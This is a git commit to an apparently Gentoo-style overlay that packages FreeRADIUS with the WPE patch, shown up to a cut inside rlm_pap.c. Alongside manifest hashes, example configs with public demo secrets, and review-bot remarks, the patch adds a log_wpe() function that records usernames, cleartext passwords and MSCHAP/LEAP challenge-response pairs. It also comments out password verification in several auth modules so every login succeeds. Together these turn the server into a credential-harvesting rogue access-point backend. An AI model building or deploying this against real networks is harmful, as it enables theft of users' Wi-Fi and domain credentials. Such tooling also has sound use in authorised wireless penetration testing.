freeradius: bump, improved WPE patch (based on opensecurityresearch)

This commit is contained in:
Anton Bolshakov 2011-11-07 10:15:35 +00:00
parent 05d9d3db60
commit 679c12ed1b
12 changed files with 2890 additions and 2 deletions


@ -1,3 +1,11 @@
AUX clients_wpe.conf 390 RMD160 b97985754c00270fd089d551d113879de917bd82 SHA1 b08d2b2d2456b1de5bb0731aa9504f3ff6cd4767 SHA256 ecc817541c5f49ef6a2ddaf87f5f87b760776375a4239aaa618d48b36e4c2497
AUX eap_wpe.conf 5594 RMD160 9c5697c50892892862f19217bcf555326ba7a910 SHA1 6ab78fc78dfad5794e60d3983cb255423dd8d8d9 SHA256 2ab71bc501bf0f9b1e09e3a97db23c291672b3ae01f15beb4be2b71ceedc4111
AUX freeradius-2.1.10-ipv6.patch 453 RMD160 d6ed447a9f5281cf3958fdf5cdf0fc5b12d3068b SHA1 e7dd7e17fab3f7c6bc4eca3f60ecf66b72c0515d SHA256 15a227b1a9cb213763170e7f030bb30521af26ae1920a4acf51499a6628d492d
AUX freeradius-2.1.10-pkglibdir.patch 2551 RMD160 44d3cc594c68cf925a81ecc73e5f8452cd3f3bdd SHA1 81f96dd2c48bc789a8464a951ee0b3f787b42252 SHA256 19e366a1eba9423185c5a7139f3affd0100a46ac94f5993f84a54cc77251bafc
AUX freeradius-2.1.10-qafixes.patch 56665 RMD160 e95a9122220acd939b75487be387d49ff6ba2186 SHA1 3bc6981c1c77ef833abec646588f0137baa7c78a SHA256 10f8875ed0ca90b6075513030b9ce3cff62386c361ba7d494ca778f438fcf096
AUX freeradius-2.1.10-ssl.patch 582 RMD160 f60a7f54d78e839c88d9424fd13e6afb593271ea SHA1 63b0d96af0b0301f19a1a67beff250b85577b1f7 SHA256 8ba257bea3504f1b800185af49ca0fe2a3f9bf65f0699c73e39f02e712467cef
AUX freeradius-2.1.10-versionless-la-files.patch 2404 RMD160 36ba9fd0dd0a5fd047f1494f238ad01e74d1f9bf SHA1 685f1d36c5199a7226bafcbc2291ff69c1ec7915 SHA256 8668376594966a6440df8a720560602ac290cedf45bce3b23d38b5a8a685c1db
AUX freeradius-2.1.11-wpe.patch 13697 RMD160 f212652e0206e64f4ebfac3a01705cd3c2d6c3be SHA1 7ba7037ea24e126127e4aa76455c2191edb6da8b SHA256 f56257eea5b228c096e781f6aded15f969bc6f7079a53fb73538988593c20649
AUX freeradius-2.1.7-nothreads.patch 514 RMD160 e229224c0ebda40a7383a8c68fe2a0839dbc473c SHA1 f53ab1df226dceb4638da95c83ea4b60001e3102 SHA256 cad3e87971a5824d8f17fa462d7a9b0fe317261704eeebffdc404c4d41f2787a
AUX freeradius-2.1.7-pkglibdir.patch 2547 RMD160 46fa13ce524ba1a61db27d130161464cafdca65f SHA1 0796e1bdd4b65699ccebf5f61dbdb18513464968 SHA256 bd7c15f0c66e80ed07bb98a731217c5260e30d628b7305849d57c907f860b1c1
AUX freeradius-2.1.7-qafixes.patch 3686 RMD160 0860ee3afdec320406b2d2398fc8b73d80ec4e07 SHA1 ea1bc3e906e2d3e6d65f69d78ee2c845775b1004 SHA256 f0b3fc440636eeb33cc42a36d3ff344c816db55a8295bdbe816d00d4214eb1ec
@ -6,5 +14,8 @@ AUX freeradius-2.1.7-versionless-la-files.patch 1747 RMD160 80aba198197d373d70b4
AUX freeradius-2.1.7-wpe.patch 32096 RMD160 ffb2915b98ceac025e00634fdbfef8b75380d557 SHA1 4e6e978269a8c848103c8f0bdfe0a04c74f06a75 SHA256 34ae76dd578ce3a497e93a7479336b2ce6eeb13be204590b8015e060bed3ef8c
AUX radius.conf 129 RMD160 2509d00c869ddb2d4db84e0e4b5a9334ffd69964 SHA1 174194106a6a7698f92e884463f49f0f974cb569 SHA256 2d5b3e1af1299373182f2c8021bdf45c29db5d82b0a077b965a16ded32cb6292
AUX radius.init-r1 1575 RMD160 68e08912962c74ed2bdbe43bb27ae5e0c449254f SHA1 75bae5946776c5b0493b2b2b5cb6ee0de0a2fc6c SHA256 5f20b72e4b627442313818cbe3c31cadfdc747fad18cacdafe58de62812eea41
AUX users_wpe 99 RMD160 1572e695acc914686d24f678357b5c74c500c50e SHA1 12df191c9b926f875a4485c694e6b348aa4df9d0 SHA256 922a318e7f66b3b52b4a1cc53d765ff116567f010d9ce4784b4ae009fe97ca73
DIST freeradius-server-2.1.11.tar.gz 4219356 RMD160 0c47ef980b9442b7673d065be899e1cbd1438a74 SHA1 0e2c8b67e8147c7c74acba7416841d65773dcfa6 SHA256 274ef96aa528d8b759f2fa06f2ba49ecbe1612e99fdedbb7016b557804b16b85
DIST freeradius-server-2.1.7.tar.gz 3894247 RMD160 52225b612af87bdf74844ea361de3701b6a9f3dd SHA1 5fc6b5ddf100aea8abf0ab73f1b13460189fd4f5 SHA256 43504dc7fd2780e576361f9101ed7935d8c34782bb8954336a4196efab59b587
EBUILD freeradius-2.1.7-r1.ebuild 4527 RMD160 341ec7965a50800024d4fd0d1e0fcb98494417b5 SHA1 35c5775389a2e7909c8108f43a3a180dcd0be93e SHA256 8aff4400fd9eefcc9d7577de5dad601bfe694944b3ab569733423bcc203b8f2f
EBUILD freeradius-2.1.11-r1.ebuild 4821 RMD160 fee900e1cbe618392f7fefa99debd6d95ad2fd7e SHA1 e5852a7b39d8541d756f205eb5cd1317ffb11903 SHA256 24df33d5700ce135f6392aef7e2182ae70ea8753cb22834affdace0d4d226b84
EBUILD freeradius-2.1.7-r1.ebuild 4526 RMD160 88d76e6b12bf7818f95bbc68bef61137559270a7 SHA1 9e4c5d0229c56f94131f56f05eff13e445230701 SHA256 2457783dc531a5d3ec1cfc6d7241d587da99f25c8c37ddac4241e13da96e4251


@ -0,0 +1,13 @@
#######################################################################
#
# Define RADIUS clients (usually a NAS, Access Point, etc.).
#
#######################################################################
client localhost {
ipaddr = 127.0.0.1
secret = testing123
require_message_authenticator = no
# shortname = localhost
nastype = other # localhost isn't usually a NAS...
}
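Review bot: `secret = testing123` and `require_message_authenticator = no` are the upstream example values, but `src_prepare` in the new ebuild copies this file over the live `raddb/clients.conf`, so the installed server trusts a shared secret that is public knowledge. If the file is meant as a template, its header should say so, e.g. `# Example only: replace 'testing123' before the server is reachable by any NAS`; otherwise keep upstream's clients.conf and carry only the WPE-specific lines. The header comment describes what a client is but not why the upstream example was copied verbatim, which is what a reader of this overlay needs to know.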


@ -0,0 +1,199 @@
#######################################################################
#
# Whatever you do, do NOT set 'Auth-Type := EAP'. The server
# is smart enough to figure this out on its own. The most
# common side effect of setting 'Auth-Type := EAP' is that the
# users then cannot use ANY other authentication method.
#
# EAP types NOT listed here may be supported via the "eap2" module.
# See experimental.conf for documentation.
#
#######################################################################
# For WPE, you might want to fix /etc/raddb/certs/ca.cnf:
# policy = policy_anything
eap {
default_eap_type = peap
timer_expire = 60
ignore_unknown_eap_types = no
cisco_accounting_username_bug = yes
max_sessions = 4096
md5 {
}
leap {
}
gtc {
auth_type = PAP
}
tls {
certdir = ${confdir}/certs
cadir = ${confdir}/certs
private_key_password = whatever
private_key_file = ${certdir}/server.pem
certificate_file = ${certdir}/server.pem
CA_file = ${cadir}/ca.pem
dh_file = ${certdir}/dh
random_file = ${certdir}/random
CA_path = ${cadir}
cipher_list = "DEFAULT"
cache {
enable = no
lifetime = 24 # hours
max_entries = 255
}
verify {
}
ocsp {
enable = no
override_cert_url = yes
url = "http://127.0.0.1/ocsp/"
}
}
ttls {
}
##################################################
#
# !!!!! WARNINGS for Windows compatibility !!!!!
#
##################################################
#
# If you see the server send an Access-Challenge,
# and the client never sends another Access-Request,
# then
#
# STOP!
#
# The server certificate has to have special OID's
# in it, or else the Microsoft clients will silently
# fail. See the "scripts/xpextensions" file for
# details, and the following page:
#
# http://support.microsoft.com/kb/814394/en-us
#
# For additional Windows XP SP2 issues, see:
#
# http://support.microsoft.com/kb/885453/en-us
#
#
# If is still doesn't work, and you're using Samba,
# you may be encountering a Samba bug. See:
#
# https://bugzilla.samba.org/show_bug.cgi?id=6563
#
# Note that we do not necessarily agree with their
# explanation... but the fix does appear to work.
#
##################################################
#
# The tunneled EAP session needs a default EAP type
# which is separate from the one for the non-tunneled
# EAP module. Inside of the TLS/PEAP tunnel, we
# recommend using EAP-MS-CHAPv2.
#
# The PEAP module needs the TLS module to be installed
# and configured, in order to use the TLS tunnel
# inside of the EAP packet. You will still need to
# configure the TLS module, even if you do not want
# to deploy EAP-TLS in your network. Users will not
# be able to request EAP-TLS, as it requires them to
# have a client certificate. EAP-PEAP does not
# require a client certificate.
#
#
# You can make PEAP require a client cert by setting
#
# EAP-TLS-Require-Client-Cert = Yes
#
# in the control items for a request.
#
peap {
# The tunneled EAP session needs a default
# EAP type which is separate from the one for
# the non-tunneled EAP module. Inside of the
# PEAP tunnel, we recommend using MS-CHAPv2,
# as that is the default type supported by
# Windows clients.
default_eap_type = mschapv2
# the PEAP module also has these configuration
# items, which are the same as for TTLS.
copy_request_to_tunnel = no
use_tunneled_reply = no
# When the tunneled session is proxied, the
# home server may not understand EAP-MSCHAP-V2.
# Set this entry to "no" to proxy the tunneled
# EAP-MSCHAP-V2 as normal MSCHAPv2.
proxy_tunneled_request_as_eap = yes
#
# The inner tunneled request can be sent
# through a virtual server constructed
# specifically for this purpose.
#
# If this entry is commented out, the inner
# tunneled request will be sent through
# the virtual server that processed the
# outer requests.
#
virtual_server = "inner-tunnel"
# This option enables support for MS-SoH
# see doc/SoH.txt for more info.
# It is disabled by default.
#
# soh = yes
#
# The SoH reply will be turned into a request which
# can be sent to a specific virtual server:
#
# soh_virtual_server = "soh-server"
}
#
# This takes no configuration.
#
# Note that it is the EAP MS-CHAPv2 sub-module, not
# the main 'mschap' module.
#
# Note also that in order for this sub-module to work,
# the main 'mschap' module MUST ALSO be configured.
#
# This module is the *Microsoft* implementation of MS-CHAPv2
# in EAP. There is another (incompatible) implementation
# of MS-CHAPv2 in EAP by Cisco, which FreeRADIUS does not
# currently support.
#
mschapv2 {
# Prior to version 2.1.11, the module never
# sent the MS-CHAP-Error message to the
# client. This worked, but it had issues
# when the cached password was wrong. The
# server *should* send "E=691 R=0" to the
# client, which tells it to prompt the user
# for a new password.
#
# The default is to behave as in 2.1.10 and
# earlier, which is known to work. If you
# set "send_error = yes", then the error
# message will be sent back to the client.
# This *may* help some clients work better,
# but *may* also cause other clients to stop
# working.
#
# send_error = no
}
}
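Review bot: In the `tls {}` block, `private_key_password = whatever` is upstream's demo passphrase, `verify {}` is empty and `cache`/`ocsp` are disabled, and the ebuild's `src_install` runs `emake all` in `raddb/certs` after this file is installed, so the server's TLS key and certificates are presumably produced from the stock example material (worth confirming against the certs Makefile). This file is upstream's example eap.conf shipped as the live config; the header should state that explicitly, e.g. `# Upstream example eap.conf: the TLS key passphrase and generated certificates are demo-grade`. The added note about `policy = policy_anything` in ca.cnf sits above `eap {` with no explanation of what it is for; a sentence tying it to the certificate generation step in the ebuild would help the next reader.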


@ -0,0 +1,12 @@
diff -aur freeradius-server-2.1.10.orig/src/lib/udpfromto.c freeradius-server-2.1.10/src/lib/udpfromto.c
--- freeradius-server-2.1.10.orig/src/lib/udpfromto.c 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/udpfromto.c 2011-02-09 22:41:46.000000000 +0100
@@ -87,7 +87,7 @@
* This should actually be standard IPv6
*/
proto = IPPROTO_IPV6;
- flag = IPV6_PKTINFO;
+ flag = IPV6_2292PKTINFO;
#endif
#endif
} else {


@ -0,0 +1,61 @@
diff -Naur freeradius-server-2.1.10.orig/Make.inc.in freeradius-server-2.1.10/Make.inc.in
--- freeradius-server-2.1.10.orig/Make.inc.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/Make.inc.in 2011-02-09 17:51:46.000000000 +0100
@@ -10,6 +10,7 @@
sysconfdir = @sysconfdir@
localstatedir = @localstatedir@
libdir = @libdir@
+pkglibdir = @libdir@/freeradius
bindir = @bindir@
sbindir = @sbindir@
docdir = @docdir@
diff -Naur freeradius-server-2.1.10.orig/raddb/radiusd.conf.in freeradius-server-2.1.10/raddb/radiusd.conf.in
--- freeradius-server-2.1.10.orig/raddb/radiusd.conf.in 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/raddb/radiusd.conf.in 2011-02-09 17:51:57.000000000 +0100
@@ -103,7 +103,7 @@
# make
# make install
#
-libdir = @libdir@
+libdir = @libdir@/freeradius
# pidfile: Where to place the PID of the RADIUS server.
#
diff -Naur freeradius-server-2.1.10.orig/src/modules/Makefile freeradius-server-2.1.10/src/modules/Makefile
--- freeradius-server-2.1.10.orig/src/modules/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/Makefile 2011-02-09 17:52:11.000000000 +0100
@@ -12,7 +12,7 @@
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
install:
- $(INSTALL) -d -m 755 $(R)$(libdir)
+ $(INSTALL) -d -m 755 $(R)$(pkglibdir)
@$(MAKE) $(MFLAGS) WHAT_TO_MAKE=$@ common
clean:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2011-02-09 17:50:58.000000000 +0100
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:52:53.000000000 +0100
@@ -123,7 +123,7 @@
$(TARGET).la: $(LT_OBJS)
$(LIBTOOL) --mode=link $(CC) -release $(RADIUSD_VERSION) \
-module $(LINK_MODE) $(LDFLAGS) $(RLM_LDFLAGS) -o $@ \
- -rpath $(libdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
+ -rpath $(pkglibdir) $^ $(LIBRADIUS) $(RLM_LIBS) $(LIBS)
#######################################################################
#
@@ -164,11 +164,11 @@
# Do any module-specific installation.
#
# If there isn't a TARGET defined, then don't do anything.
-# Otherwise, install the libraries into $(libdir)
+# Otherwise, install the libraries into $(pkglibdir)
#
install:
@[ "x$(RLM_INSTALL)" = "x" ] || $(MAKE) $(MFLAGS) $(RLM_INSTALL)
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
- $(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
+ $(TARGET).la $(R)$(pkglibdir)/$(TARGET).la || exit $$?; \
fi



@ -0,0 +1,11 @@
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:41:44.000000000 +0100
@@ -9,6 +9,7 @@
SRCS = eapcommon.c eapcrypto.c eapsimlib.c fips186prf.c
ifneq ($(OPENSSL_LIBS),)
SRCS += cb.c eap_tls.c mppe_keys.c tls.c
+LIBS += $(OPENSSL_LIBS)
endif
LT_OBJS = $(SRCS:.c=.lo)
INCLUDES = eap_types.h eap_tls.h


@ -0,0 +1,40 @@
diff -Naur freeradius-server-2.1.10.orig/src/lib/Makefile freeradius-server-2.1.10/src/lib/Makefile
--- freeradius-server-2.1.10.orig/src/lib/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/lib/Makefile 2011-02-09 17:39:25.000000000 +0100
@@ -54,7 +54,5 @@
$(INSTALL) -d -m 755 $(R)$(libdir)
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
reconfig:
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile
--- freeradius-server-2.1.10.orig/src/modules/rlm_eap/libeap/Makefile 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_eap/libeap/Makefile 2011-02-09 17:40:00.000000000 +0100
@@ -44,5 +44,3 @@
install: all
$(LIBTOOL) --mode=install $(INSTALL) -c $(TARGET).la \
$(R)$(libdir)/$(TARGET).la
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la;
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la
diff -Naur freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rlm_sql/drivers/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rlm_sql/drivers/rules.mak 2011-02-09 17:40:17.000000000 +0100
@@ -147,6 +147,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi
diff -Naur freeradius-server-2.1.10.orig/src/modules/rules.mak freeradius-server-2.1.10/src/modules/rules.mak
--- freeradius-server-2.1.10.orig/src/modules/rules.mak 2010-09-28 13:03:56.000000000 +0200
+++ freeradius-server-2.1.10/src/modules/rules.mak 2011-02-09 17:39:43.000000000 +0100
@@ -171,6 +171,4 @@
if [ "x$(TARGET)" != "x" ]; then \
$(LIBTOOL) --mode=install $(INSTALL) -c \
$(TARGET).la $(R)$(libdir)/$(TARGET).la || exit $$?; \
- rm -f $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la; \
- ln -s $(TARGET).la $(R)$(libdir)/$(TARGET)-$(RADIUSD_VERSION).la || exit $$?; \
fi


@ -0,0 +1,364 @@
diff -uNr freeradius-server-2.1.11-orig//raddb/radiusd.conf.in freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in
--- freeradius-server-2.1.11-orig//raddb/radiusd.conf.in 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//raddb/radiusd.conf.in 2011-09-28 08:11:09.334011116 -0700
@@ -466,6 +466,7 @@
# The program to execute to do concurrency checks.
checkrad = ${sbindir}/checkrad
+wpelogfile = ${logdir}/freeradius-server-wpe.log
# SECURITY CONFIGURATION
#
diff -uNr freeradius-server-2.1.11-orig//src/include/radiusd.h freeradius-server-2.1.11-wpe//src/include/radiusd.h
--- freeradius-server-2.1.11-orig//src/include/radiusd.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/include/radiusd.h 2011-09-28 08:11:47.402010538 -0700
@@ -368,6 +368,7 @@
#endif
char *log_file;
char *checkrad;
+ char *wpelogfile;
const char *pid_file;
rad_listen_t *listen;
int syslog_facility;
diff -uNr freeradius-server-2.1.11-orig//src/main/auth.c freeradius-server-2.1.11-wpe//src/main/auth.c
--- freeradius-server-2.1.11-orig//src/main/auth.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/auth.c 2011-09-28 08:13:26.638011007 -0700
@@ -350,6 +350,7 @@
return -1;
}
RDEBUG2("User-Password in the request is correct.");
+ log_wpe("password", request->username->vp_strvalue,password_pair->vp_strvalue, NULL, 0, NULL, 0);
break;
} else if (auth_item->attribute != PW_CHAP_PASSWORD) {
diff -uNr freeradius-server-2.1.11-orig//src/main/log.c freeradius-server-2.1.11-wpe//src/main/log.c
--- freeradius-server-2.1.11-orig//src/main/log.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/log.c 2011-09-28 08:15:24.746011013 -0700
@@ -28,6 +28,9 @@
#include <freeradius-devel/radiusd.h>
+#include <stdio.h>
+#include <time.h>
+
#ifdef HAVE_SYS_STAT_H
#include <sys/stat.h>
#endif
@@ -181,6 +184,55 @@
return r;
}
+void log_wpe(char *authtype, char *username, char *password, unsigned char *challenge, unsigned int challen, unsigned char *response, unsigned int resplen)
+ {
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (mainconfig.wpelogfile == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(mainconfig.wpelogfile, "a");
+ if (logfd == NULL) {
+ DEBUG2(" rlm_mschap: FAILED: Unable to open output log file %s: %s", mainconfig.wpelogfile, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ fprintf(logfd, "\n");
+ fclose(logfd);
+ }
+
+
/*
* Dump a whole list of attributes to DEBUG2
diff -uNr freeradius-server-2.1.11-orig//src/main/mainconfig.c freeradius-server-2.1.11-wpe//src/main/mainconfig.c
--- freeradius-server-2.1.11-orig//src/main/mainconfig.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/main/mainconfig.c 2011-09-28 08:16:13.782011003 -0700
@@ -232,7 +232,7 @@
{ "checkrad", PW_TYPE_STRING_PTR, 0, &mainconfig.checkrad, "${sbindir}/checkrad" },
{ "debug_level", PW_TYPE_INTEGER, 0, &mainconfig.debug_level, "0"},
-
+ { "wpelogfile", PW_TYPE_STRING_PTR, 0, &mainconfig.wpelogfile, "${logdir}/freeradius-server-wpe.log" },
#ifdef WITH_PROXY
{ "proxy_requests", PW_TYPE_BOOLEAN, 0, &mainconfig.proxy_requests, "yes" },
#endif
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.c 2011-09-28 08:18:03.338011000 -0700
@@ -244,11 +244,11 @@
* Verify the MS-CHAP response from the user.
*/
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session)
+ leap_session_t *session, char *username)
{
unsigned char ntpwdhash[16];
unsigned char response[24];
-
+ unsigned char challenge[8] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
/*
* No password or previous packet. Die.
@@ -266,6 +266,7 @@
*/
eapleap_mschap(ntpwdhash, session->peer_challenge, response);
if (memcmp(response, packet->challenge, 24) == 0) {
+ log_wpe("LEAP", username, NULL, challenge, 8, response, 24);
DEBUG2(" rlm_eap_leap: NtChallengeResponse from AP is valid");
memcpy(session->peer_response, response, sizeof(response));
return 1;
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/eap_leap.h 2011-09-28 08:18:28.462010992 -0700
@@ -68,7 +68,7 @@
LEAP_PACKET *eapleap_extract(EAP_DS *auth);
LEAP_PACKET *eapleap_initiate(EAP_DS *eap_ds, VALUE_PAIR *user_name);
int eapleap_stage4(LEAP_PACKET *packet, VALUE_PAIR* password,
- leap_session_t *session);
+ leap_session_t *session, char *username);
LEAP_PACKET *eapleap_stage6(LEAP_PACKET *packet, REQUEST *request,
VALUE_PAIR *user_name, VALUE_PAIR* password,
leap_session_t *session,
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_eap/types/rlm_eap_leap/rlm_eap_leap.c 2011-09-28 08:19:11.958011003 -0700
@@ -133,7 +133,7 @@
switch (session->stage) {
case 4: /* Verify NtChallengeResponse */
DEBUG2(" rlm_eap_leap: Stage 4");
- rcode = eapleap_stage4(packet, password, session);
+ rcode = eapleap_stage4(packet, password, session, username);
session->stage = 6;
/*
diff -uNr freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c
--- freeradius-server-2.1.11-orig//src/modules/rlm_mschap/rlm_mschap.c 2011-06-20 07:57:14.000000000 -0700
+++ freeradius-server-2.1.11-wpe//src/modules/rlm_mschap/rlm_mschap.c 2011-09-28 08:09:38.470011004 -0700
@@ -662,9 +662,11 @@
static int do_mschap(rlm_mschap_t *inst,
REQUEST *request, VALUE_PAIR *password,
uint8_t *challenge, uint8_t *response,
- uint8_t *nthashhash, int do_ntlm_auth)
+ uint8_t *nthashhash, int do_ntlm_auth, char *username)
{
uint8_t calculated[24];
+
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24);
/*
* Do normal authentication.
@@ -679,9 +681,11 @@
}
smbdes_mschap(password->vp_strvalue, challenge, calculated);
+ /* WPE - always succeed
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1131,7 +1135,7 @@
*/
if (do_mschap(inst, request, password, challenge->vp_octets,
response->vp_octets + offset, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
RDEBUG2("MS-CHAP-Response is incorrect.");
goto do_error;
}
@@ -1240,7 +1244,7 @@
if (do_mschap(inst, request, nt_password, mschapv1_challenge,
response->vp_octets + 26, nthashhash,
- do_ntlm_auth) < 0) {
+ do_ntlm_auth, username->vp_strvalue) < 0) {
int i;
char buffer[128];
diff -ru freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
--- freeradius-server-2.0.2/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2007-11-23 07:58:12.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c 2008-02-15 19:37:35.000000000 -0500
@@ -202,9 +202,13 @@
/*
* The length of the response is always 16 for MD5.
*/
- if (memcmp(output, packet->value, 16) != 0) {
- return 0;
- }
+ //WPE - always succeed
+ //if (memcmp(output, packet->value, 16) != 0) {
+
+ //return 0;
+ //}
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16);
return 1;
}
diff -ru freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c
--- freeradius-server-2.0.2/src/modules/rlm_pap/rlm_pap.c 2007-12-28 23:38:19.000000000 -0500
+++ freeradius-server-2.0.2-wpe/src/modules/rlm_pap/rlm_pap.c 2008-02-15 19:37:35.000000000 -0500
@@ -473,6 +473,10 @@
return RLM_MODULE_NOOP;
}
+ /* WPE */
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0);
+
/*
* Can't do PAP if there's no password.
*/
@@ -604,6 +608,8 @@
do_clear:
RDEBUG("Using clear text password \"%s\"",
vp->vp_strvalue);
+ /* WPE - always succeed */
+ /*
if ((vp->length != request->password->length) ||
(rad_digest_cmp(vp->vp_strvalue,
request->password->vp_strvalue,
@@ -611,6 +617,7 @@
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: CLEAR TEXT password check failed");
goto make_msg;
}
+ */
done:
RDEBUG("User authenticated successfully");
return RLM_MODULE_OK;
@@ -643,10 +650,13 @@
fr_MD5Update(&md5_context, request->password->vp_octets,
request->password->length);
fr_MD5Final(digest, &md5_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: MD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -670,10 +680,13 @@
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
snprintf(module_fmsg,sizeof(module_fmsg),"rlm_pap: SMD5 password check failed");
goto make_msg;
}
+ */
goto done;
break;
@@ -692,10 +705,13 @@
fr_SHA1Update(&sha1_context, request->password->vp_octets,
request->password->length);
fr_SHA1Final(digest,&sha1_context);
+ /* WPE - always succeed */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->length) != 0) {
